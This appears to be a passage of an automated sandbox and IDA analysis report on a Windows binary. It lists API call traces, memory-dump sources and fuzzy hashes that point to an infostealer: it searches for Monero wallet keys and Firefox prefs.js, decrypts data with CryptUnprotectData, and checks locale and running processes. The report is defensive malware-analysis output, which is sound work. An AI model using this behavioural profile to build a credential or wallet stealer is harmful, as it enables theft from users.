                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009BA920: lstrcpy.KERNEL32(00000000,?), ref: 009BA972
                    • Part of subcall function 009BA920: lstrcat.KERNEL32(00000000), ref: 009BA982
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009C15B8,009C0D96), ref: 009AF71E
                  • StrCmpCA.SHLWAPI(?,009C15BC), ref: 009AF76F
                  • StrCmpCA.SHLWAPI(?,009C15C0), ref: 009AF785
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 009AFAB1
                  • FindClose.KERNEL32(000000FF), ref: 009AFAC3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: prefs.js
                  • API String ID: 3334442632-3783873740
                  • Opcode ID: 709f43b8146e04dab5d7e17e2cf5a087b004603c73826d677a00c3aef6a0dd88
                  • Instruction ID: fbb6234243a483e372cb48bc4c24f1a8e982cd0de3d25cc2e23c04918fa9ad68
                  • Opcode Fuzzy Hash: 709f43b8146e04dab5d7e17e2cf5a087b004603c73826d677a00c3aef6a0dd88
                  • Instruction Fuzzy Hash: 4EB15471900118ABDB24FF60DDA6FEE7379AFD5310F4085A8A40A97191EF306B49CF92
                  APIs
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009C510C,?,?,?,009C51B4,?,?,00000000,?,00000000), ref: 009A1923
                  • StrCmpCA.SHLWAPI(?,009C525C), ref: 009A1973
                  • StrCmpCA.SHLWAPI(?,009C5304), ref: 009A1989
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 009A1D40
                  • DeleteFileA.KERNEL32(00000000), ref: 009A1DCA
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 009A1E20
                  • FindClose.KERNEL32(000000FF), ref: 009A1E32
                    • Part of subcall function 009BA920: lstrcpy.KERNEL32(00000000,?), ref: 009BA972
                    • Part of subcall function 009BA920: lstrcat.KERNEL32(00000000), ref: 009BA982
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 1415058207-1173974218
                  • Opcode ID: 38bf3ed95a922456c6b5dc4b696b26eab595b9a62107e49b537e9bd9eaa661b1
                  • Instruction ID: 1e830326fe055df5d5720e63f5faac6392c664337212d7a80a545de69fb14414
                  • Opcode Fuzzy Hash: 38bf3ed95a922456c6b5dc4b696b26eab595b9a62107e49b537e9bd9eaa661b1
                  • Instruction Fuzzy Hash: AF120471910118ABDB29FB60CDA6FEE737CAF94710F404599B10666491EF306F89CFA2
                  APIs
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,009C0C2E), ref: 009ADE5E
                  • StrCmpCA.SHLWAPI(?,009C14C8), ref: 009ADEAE
                  • StrCmpCA.SHLWAPI(?,009C14CC), ref: 009ADEC4
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 009AE3E0
                  • FindClose.KERNEL32(000000FF), ref: 009AE3F2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                  • String ID: \*.*
                  • API String ID: 2325840235-1173974218
                  • Opcode ID: 85ac9041d8c2ad6b97ba1fda8a0d4d200c2d6532779834b3599f8fecd9563842
                  • Instruction ID: a8cf71b689c1d1ecd7452a60c1ffea932a5acfc7025b86c708fc3204dcd7176d
                  • Opcode Fuzzy Hash: 85ac9041d8c2ad6b97ba1fda8a0d4d200c2d6532779834b3599f8fecd9563842
                  • Instruction Fuzzy Hash: 72F19271914118AADB29FB60CDA5FEE7338BF94710F8041D9B41A62491EF306F4ACF66
                  APIs
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009BA920: lstrcpy.KERNEL32(00000000,?), ref: 009BA972
                    • Part of subcall function 009BA920: lstrcat.KERNEL32(00000000), ref: 009BA982
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009C14B0,009C0C2A), ref: 009ADAEB
                  • StrCmpCA.SHLWAPI(?,009C14B4), ref: 009ADB33
                  • StrCmpCA.SHLWAPI(?,009C14B8), ref: 009ADB49
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 009ADDCC
                  • FindClose.KERNEL32(000000FF), ref: 009ADDDE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID:
                  • API String ID: 3334442632-0
                  • Opcode ID: 83033af0f5fc4dcbc183155e4c5900fc81110f82d52486b6b9a1184d1ebe4f70
                  • Instruction ID: 1fc635fcd40827a1a17831e0b66962cb974c38e2bf1b5959799d1962133cddb8
                  • Opcode Fuzzy Hash: 83033af0f5fc4dcbc183155e4c5900fc81110f82d52486b6b9a1184d1ebe4f70
                  • Instruction Fuzzy Hash: 84913472D00108ABCB14FBB0ED96AED777DAFC5310F408558F90A96591EE34AB49CBD2
                  APIs
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                  • GetKeyboardLayoutList.USER32(00000000,00000000,009C05AF), ref: 009B7BE1
                  • LocalAlloc.KERNEL32(00000040,?), ref: 009B7BF9
                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 009B7C0D
                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 009B7C62
                  • LocalFree.KERNEL32(00000000), ref: 009B7D22
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                  • String ID: /
                  • API String ID: 3090951853-4001269591
                  • Opcode ID: f48a018640008d0474bf6595c4a3b1a78c1502be7e8001631feec96bce5ebbdc
                  • Instruction ID: 49054b45c38479eb267f7dbf376623bdfd1c33648bd33edd0a9840262f161b29
                  • Opcode Fuzzy Hash: f48a018640008d0474bf6595c4a3b1a78c1502be7e8001631feec96bce5ebbdc
                  • Instruction Fuzzy Hash: 05414C71940218ABDB24DB94DD99BEEB778FF84710F2042D9E00A66291DB346F85CFA1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: yw$No_$ r}$&}~.$[eyV$|b2=$}T{Z
                  • API String ID: 0-2555411163
                  • Opcode ID: 67d7ca42d8ebbba1a3fa602a03ce989955a09299e880104022f3726ef3a06211
                  • Instruction ID: 234c19e67778130d1b62e6840de410838cfbf60a1b1a0d08e1c37b014420869c
                  • Opcode Fuzzy Hash: 67d7ca42d8ebbba1a3fa602a03ce989955a09299e880104022f3726ef3a06211
                  • Instruction Fuzzy Hash: 06B20AF3A082049FD7046E2DEC8567AFBE9EFD4720F1A853DEAC4C3744E67598058692
                  APIs
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009BA920: lstrcpy.KERNEL32(00000000,?), ref: 009BA972
                    • Part of subcall function 009BA920: lstrcat.KERNEL32(00000000), ref: 009BA982
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,009C0D73), ref: 009AE4A2
                  • StrCmpCA.SHLWAPI(?,009C14F8), ref: 009AE4F2
                  • StrCmpCA.SHLWAPI(?,009C14FC), ref: 009AE508
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 009AEBDF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 433455689-1173974218
                  • Opcode ID: f21b5fe2974b46fd62d65ee8e46d85a8f7db308a26bb447c084f2f6083ef90e8
                  • Instruction ID: c716cde70bdd4fff542b245dd72fc61bacd27fe7268276d9d5b51da9dd9f1945
                  • Opcode Fuzzy Hash: f21b5fe2974b46fd62d65ee8e46d85a8f7db308a26bb447c084f2f6083ef90e8
                  • Instruction Fuzzy Hash: EE125471910118AADB28FB60DEA6FED733CAFD4710F404598B50A96491EF306F49CF96
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 1y}$3u6$A-$ErK/$Fv?$^?yi
                  • API String ID: 0-2891130678
                  • Opcode ID: e2907198c6ad0b982537764fdd7bf20df93f2091e5f0f83c806f06550d6f9719
                  • Instruction ID: 045da1079f8f6913db7e5fa9fbd0a5e1151e5833373ecb82e0687470c20d01a1
                  • Opcode Fuzzy Hash: e2907198c6ad0b982537764fdd7bf20df93f2091e5f0f83c806f06550d6f9719
                  • Instruction Fuzzy Hash: 1FB208F3A086049FE304AE2DDC8567AFBE9EF94720F1A853DE9C4D3744E63598058693
                  APIs
                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 009AC871
                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 009AC87C
                  • lstrcat.KERNEL32(?,009C0B46), ref: 009AC943
                  • lstrcat.KERNEL32(?,009C0B47), ref: 009AC957
                  • lstrcat.KERNEL32(?,009C0B4E), ref: 009AC978
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$BinaryCryptStringlstrlen
                  • String ID:
                  • API String ID: 189259977-0
                  • Opcode ID: 0462c120872afe7301365fc2e6ce85257c0b07c011fcfa21778254706e6f2465
                  • Instruction ID: 4bd4e5a5ff0e3f192d9804cc0171f107b14ca23e21069020702d9e2e9711b534
                  • Opcode Fuzzy Hash: 0462c120872afe7301365fc2e6ce85257c0b07c011fcfa21778254706e6f2465
                  • Instruction Fuzzy Hash: EE4132B5D0421ADFDB10DF94DD85BEEB7B8AB84704F1045A8F509AB280D7746A84CF92
                  APIs
                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 009A724D
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009A7254
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 009A7281
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 009A72A4
                  • LocalFree.KERNEL32(?), ref: 009A72AE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                  • String ID:
                  • API String ID: 2609814428-0
                  • Opcode ID: 4e07e07d5a7c5fc9f290ebc1b034f79adc9dd442d318f6b4664dd7b4fb6493bf
                  • Instruction ID: fb95ca470153b3154ec87239672d39c28099da409bcd5f82bcc2ee7c54c22311
                  • Opcode Fuzzy Hash: 4e07e07d5a7c5fc9f290ebc1b034f79adc9dd442d318f6b4664dd7b4fb6493bf
                  • Instruction Fuzzy Hash: B3010075A40308BBDB10DBD4CD8AF9D77B8AB44700F104554FB05AB2C0DA70BA008BA5
                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009B961E
                  • Process32First.KERNEL32(009C0ACA,00000128), ref: 009B9632
                  • Process32Next.KERNEL32(009C0ACA,00000128), ref: 009B9647
